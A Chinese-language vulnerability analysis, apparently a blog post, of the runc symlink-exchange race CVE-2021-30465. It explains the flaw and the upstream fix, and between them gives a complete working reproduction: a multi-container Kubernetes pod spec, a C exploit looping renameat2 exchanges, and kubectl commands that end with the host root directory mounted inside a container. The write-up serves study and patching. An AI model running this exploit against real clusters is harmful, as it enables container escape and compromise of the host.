漏洞分析
CVE-2021-30465是runc中的一个漏洞:攻击者可以通过条件竞争(利用符号链接交换)绕过对挂载路径的检查,将宿主机的目录挂载到容器中。
在容器中挂载volume之前,runc会先调用SecureJoin()检查挂载的目标路径,并将其拼接到容器的根目录下;如果路径中包含符号链接,则会在容器根目录的范围内将其替换成该符号链接指向的对应路径[1.1]。
case "tmpfs": copyUp := m.Extensions&configs.EXT_COPYUP == configs.EXT_COPYUP tmpDir := "" // dest might be an absolute symlink, so it needs // to be resolved under rootfs. dest, err := securejoin.SecureJoin(rootfs, m.Destination) if err != nil { return err } m.Destination = dest stat, err := os.Stat(dest) if err != nil { if err := os.MkdirAll(dest, 0755); err != nil { return err } } ...... if copyUp { if err := fileutils.CopyDirectory(dest, tmpDir); err != nil { errMsg := fmt.Errorf("tmpcopyup: failed to copy %s to %s: %v", dest, tmpDir, err) if err1 := unix.Unmount(tmpDir, unix.MNT_DETACH); err1 != nil { return newSystemErrorWithCausef(err1, "tmpcopyup: %v: failed to unmount", errMsg) } return errMsg } if err := unix.Mount(tmpDir, dest, "", unix.MS_MOVE, ""); err != nil { errMsg := fmt.Errorf("tmpcopyup: failed to move mount %s to %s: %v", tmpDir, dest, err) if err1 := unix.Unmount(tmpDir, unix.MNT_DETACH); err1 != nil { return newSystemErrorWithCausef(err1, "tmpcopyup: %v: failed to unmount", errMsg) } return errMsg } }
但是路径检查和挂载操作并不是原子的,因此通过条件竞争的方式,可以在路径检查和挂载操作之间将正常路径替换为符号链接。在检查阶段,路径还不是符号链接,所以不会经过处理;而在检查之后、挂载之前,将路径替换为符号链接,挂载时就会跟随这个符号链接,使挂载操作实际作用到它指向的宿主机路径上,最终宿主机的目录就会被挂载到容器中。
漏洞复现
系统:Ubuntu 20.04
Kubernetes:1.21.0
containerd:1.4.4
创建一个包含多个容器的pod(复现方法参考[2.1]),我这里包含了20个容器,配置文件内容如下:
apiVersion: v1 kind: Pod metadata: name: pod1 spec: terminationGracePeriodSeconds: 1 containers: - name: c1 image: ubuntu:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test2 - name: c2 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c3 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c4 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c5 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c6 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c7 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: 
/test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c8 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c9 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c10 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c11 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c12 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c13 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c14 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: 
/test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c15 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c16 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c17 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c18 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c19 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c20 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz volumes: - name: test1 emptyDir: 
medium: "Memory" - name: test2 emptyDir: medium: "Memory"
可以看到除了第一个容器以外,其他容器的镜像都是无效的,因此这些容器暂时不会启动。第一个容器c1分别挂载了test1卷和test2卷各一次;其他每个容器都挂载了一次test1卷,并在/test1下的5个路径(mnt1~mnt4和zzz)上各挂载了一次test2卷。
获取创建好的pod的UID:
sudo kubectl get pod pod1 -o yaml | grep uid
编写exp,其中的24a602eb-62e2-47dd-a083-9f44489582d6需要替换为刚刚获取的UID:
#define _GNU_SOURCE #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <sys/syscall.h> #include <sys/wait.h> int main(int argc, char *argv[]) { char *name_mnts[] = {"mnt1", "mnt2", "mnt3", "mnt4"}; char *name_tmps[] = {"mnt-tmp1", "mnt-tmp2", "mnt-tmp3", "mnt-tmp4"}; char *ld = "/var/lib/kubelet/pods/24a602eb-62e2-47dd-a083-9f44489582d6/volumes/kubernetes.io~empty-dir/"; int dirfd = open(".", O_DIRECTORY|O_CLOEXEC); pid_t pid; int i; for (i=0; i<4; ++i) { pid = fork(); if (pid == 0) break; } if (pid != 0) wait(NULL); else { mkdir(name_mnts[i], 0755); symlink(ld, name_tmps[i]); while (1) renameat2(dirfd, name_mnts[i], dirfd, name_tmps[i], RENAME_EXCHANGE); } return 0; }
将编译好的exp文件放到c1容器中的/test1目录下,然后在c1容器中创建一个符号链接:
ln -s / /test2/test2
接着在c1容器中cd到/test1目录,运行exp。exp开始运行之后,回到宿主机,将其他容器的镜像更新为有效的镜像,使它们启动:
for c in {2..20}; do sudo kubectl set image pod pod1 c$c=ubuntu:latest; done
列出每个容器的/test1/zzz目录下的内容:
for c in {2..20}; do echo c$c; sudo kubectl exec -it pod/pod1 -c c$c -- ls /test1/zzz; done
由于这是条件竞争,并不是每个容器都能利用成功,成功的容器每次运行也可能不同。在我这次测试的输出结果中,可以看到c20成功获取到了宿主机根目录的内容。
官方修复
在挂载之前,runc会先以O_PATH方式打开目标路径,再读取/proc/self/fd/下对应的符号链接,得到该fd实际指向的路径,确保它和预期的挂载路径一致,否则拒绝继续操作,从而避免路径在检查之后被替换成符号链接[3.1]。
fh, err := os.OpenFile(path, unix.O_PATH|unix.O_CLOEXEC, 0) if err != nil { return fmt.Errorf("open o_path procfd: %w", err) } defer fh.Close() // Double-check the path is the one we expected. procfd := "/proc/self/fd/" + strconv.Itoa(int(fh.Fd())) if realpath, err := os.Readlink(procfd); err != nil { return fmt.Errorf("procfd verification failed: %w", err) } else if realpath != path { return fmt.Errorf("possibly malicious path detected -- refusing to operate on %s", realpath) }
参考
[1.1] https://github.com/opencontainers/runc/blob/v1.0.0-rc93/libcontainer/rootfs_linux.go#L340
[2.1] https://blog.champtar.fr/runc-symlink-CVE-2021-30465/
[3.1] https://github.com/opencontainers/runc/commit/0ca91f44f1664da834bc61115a849b56d22f595f